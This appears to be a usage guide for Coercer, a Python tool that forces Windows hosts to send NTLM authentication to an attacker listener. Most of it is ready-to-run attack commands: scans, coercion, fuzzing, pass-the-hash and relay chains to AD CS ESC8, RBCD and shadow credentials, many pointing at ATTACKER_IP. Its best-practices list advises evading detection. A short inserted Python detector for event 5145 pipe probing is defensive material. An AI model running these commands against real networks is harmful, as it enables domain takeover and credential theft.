# Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
## Installation

### Via pip

```bash
pip install coercer
```

### From GitHub

```bash
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --help
```
## Requirements

- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
## Quick Start

Basic coercion with credentials:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Scan the target to identify working methods:

```bash
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

Coerce with an NTLM hash:

```bash
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAIN
```
## Coercion Methods

Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:
| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
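The pipe names in the table are also the footprint a target's own Security log records when a client opens them over IPC$. The following added example is not part of Coercer or its documentation; it is a small detector over a constructed, simplified key=value rendering of Windows Security event 5145 (network share object access) as a SIEM might export it. It maps each pipe back to the method family and service in the table, and flags any source address that opens several of these pipes in one log, which is what a scan of all methods looks like from the target's side. Event ID 5145 and its field names are real; the flattened layout, IP addresses and user names are constructed for the example.

```python
import re
from collections import defaultdict

# Named pipes from the methods table above, mapped to the method family and
# the Windows service that backs them (values taken from the table).
COERCION_PIPES = {
    "efsrpc": ("PetitPotam / MSEFSRCoerce / EfsRpcOpenFileRaw", "EfsRpc"),
    "spoolss": ("PrinterBug", "Spooler"),
    "netdfs": ("DFSCoerce / DFSCoerceRPC", "MSDFS"),
    "vssadmin": ("ShadowCoerce", "Shadow Copy VSS"),
    "winreg": ("RprRemoteFindFirstFile", "RemoteRegistry"),
    "lsarpc": ("Lsasrv", "LSA"),
    "tssession": ("Tssession", "Terminal Services"),
}

# Constructed sample: a flattened key=value rendering of Security event 5145.
# Only the fields the detector reads are present. 192.168.1.100 opens three
# coercion pipes in a row (a scan); 192.168.1.7 is ordinary file-share use.
SAMPLE_EVENTS = [
    r"EventID=5145 IpAddress=192.168.1.100 SubjectUserName=user ShareName=\\*\IPC$ RelativeTargetName=efsrpc AccessMask=0x12019f",
    r"EventID=5145 IpAddress=192.168.1.100 SubjectUserName=user ShareName=\\*\IPC$ RelativeTargetName=spoolss AccessMask=0x12019f",
    r"EventID=5145 IpAddress=192.168.1.100 SubjectUserName=user ShareName=\\*\IPC$ RelativeTargetName=netdfs AccessMask=0x12019f",
    r"EventID=5145 IpAddress=192.168.1.7 SubjectUserName=alice ShareName=\\*\Finance RelativeTargetName=Q3\report.xlsx AccessMask=0x120089",
    r"EventID=5145 IpAddress=192.168.1.7 SubjectUserName=alice ShareName=\\*\IPC$ RelativeTargetName=srvsvc AccessMask=0x12019f",
    r"EventID=4624 IpAddress=192.168.1.7 SubjectUserName=alice LogonType=3",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Return the event's key=value fields as a dict of raw strings."""
    return dict(FIELD_RE.findall(line))


def coercion_pipe_hits(lines):
    """Return (ip, user, pipe, method, service) for every IPC$ open of a
    named pipe used by a coercion method in the table above."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5145":
            continue
        if not ev.get("ShareName", "").upper().endswith("IPC$"):
            continue
        pipe = ev.get("RelativeTargetName", "").lower()
        if pipe in COERCION_PIPES:
            method, service = COERCION_PIPES[pipe]
            hits.append((ev["IpAddress"], ev["SubjectUserName"], pipe, method, service))
    return hits


def sources_touching_many_pipes(lines, threshold=2):
    """Group hits by source IP and keep sources that opened at least
    `threshold` distinct coercion pipes. A legitimate client normally
    talks to one of these pipes at a time; a client walking through
    several of them is the shape of a scan of all methods."""
    per_ip = defaultdict(set)
    for ip, _user, pipe, _method, _service in coercion_pipe_hits(lines):
        per_ip[ip].add(pipe)
    return {ip: sorted(pipes) for ip, pipes in per_ip.items() if len(pipes) >= threshold}


if __name__ == "__main__":
    for hit in coercion_pipe_hits(SAMPLE_EVENTS):
        print("pipe access: ip=%s user=%s pipe=%s (%s via %s)" % hit)
    for ip, pipes in sources_touching_many_pipes(SAMPLE_EVENTS).items():
        print(f"ALERT: multi-pipe probing from {ip}: {', '.join(pipes)}")
```

The per-source grouping is the useful part: a single 5145 on `efsrpc` is noisy on its own, but one client opening `efsrpc`, `spoolss` and `netdfs` within a short span matches the scan mode described later on this page far more than any normal workload.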
## Scan Mode

Enumerate which coercion methods work without triggering full authentication:

```bash
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN

# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam

# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc

# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc

# Scan with a per-method timeout (seconds)
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10
```
## Coerce Mode

Trigger actual NTLM authentication to the listener:

```bash
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with a specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam

# Coerce with verbose output
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v

# Coerce to an alternative listener port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with a timeout (seconds)
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30
```
## Fuzz Mode

Discover new coercion methods by fuzzing RPC endpoints:

```bash
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100

# Fuzz a specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc

# Fuzz with a timeout (seconds)
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30
```
## Authentication Options

### Username/Password Authentication

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAIN
```

### NTLM Hash Authentication (Pass-the-Hash)

```bash
coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
# The hash still needs the user name it belongs to
coercer coerce -l LISTENER -t TARGET -u username -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```

### Kerberos Authentication

```bash
coercer coerce -l LISTENER -t TARGET -k -d DOMAIN

# Use a ticket from a credential cache
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -k
```

### No Authentication

```bash
coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-pass
```

### Local Authentication

```bash
coercer coerce -l LISTENER -t TARGET --local
```
## Listener Setup

### Using ntlmrelayx (SMB Relay)

```bash
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support

# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Using Responder (LLMNR/NBT-NS)

```bash
# Terminal 1: Start Responder
responder -I eth0 -v

# Terminal 2: Run coercer pointed at the Responder host
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Custom SMB Server Listener

```bash
# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp

# Run coercer against it
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
```

### Listening on a Specific Port

```bash
coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Common Attack Chains

### Coerce to ntlmrelayx → AD CS ESC8

```bash
# Terminal 1: Start ntlmrelayx targeting the AD CS web enrollment endpoint
# (ntlmrelayx's ADCS attack is selected with --adcs; the template flag is --template)
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp --adcs --template DomainController --no-http-server -smb2support

# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to ntlmrelayx → LDAP for RBCD

```bash
# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access

# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce to Relay for Shadow Credentials

```bash
# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials

# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN
```

### Coerce Machine Account to Relay for Privilege Escalation

```bash
# Scan first to find a working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN

# Coerce the DC to the listener for relay to AD CS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotam
```
## WebDAV Coercion

Force HTTP authentication instead of SMB for cross-protocol relay attacks:

```bash
# Enable WebDAV coercion (requires the WebClient service running on the target)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# WebDAV with a custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN

# Combine with the HTTP listener of ntlmrelayx (listener port set with --http-port)
ntlmrelayx.py --http-port 8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAIN
```
## Filtering Options

### Filter by Method Name

```bash
# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam

# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"
```

### Filter by Protocol Name

```bash
# Only the EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc

# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"
```

### Filter by Pipe Name

```bash
# Only the efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc

# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"
```

### Combine Filters

```bash
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
    --filter-method PetitPotam \
    --filter-protocol EfsRpc
```
## Troubleshooting

### Target Unreachable

```bash
# Verify connectivity
ping TARGET_IP

# Test SMB connectivity (smbclient takes credentials as -U 'user%password')
smbclient -L //TARGET_IP -U 'domain\user%password'

# Test with a longer timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30
```

### Authentication Failed

```bash
# Verify credentials with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try the alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN

# Use an NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAIN
```

### Service Not Available

```bash
# Some methods require specific services to be running on the target
# (MSDFS, Spooler, EfsRpc); verbose scan output shows which methods fail
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try with an increased timeout
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60
```

### No Working Methods Found

```bash
# The method may be patched or the service disabled; scan with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Enumerate installed hotfixes (run on the Windows host)
wmic qfe list brief /format:list
```

### Listener Connection Issues

```bash
# Verify the listener is running and reachable
telnet LISTENER_IP 445

# Check firewall rules on the listener host
sudo ufw allow 445/tcp

# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -v
```
## Best Practices

- Always Scan First: Use `coercer scan` to identify working methods before triggering full coercion
- Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or the relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
## Related Tools

| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |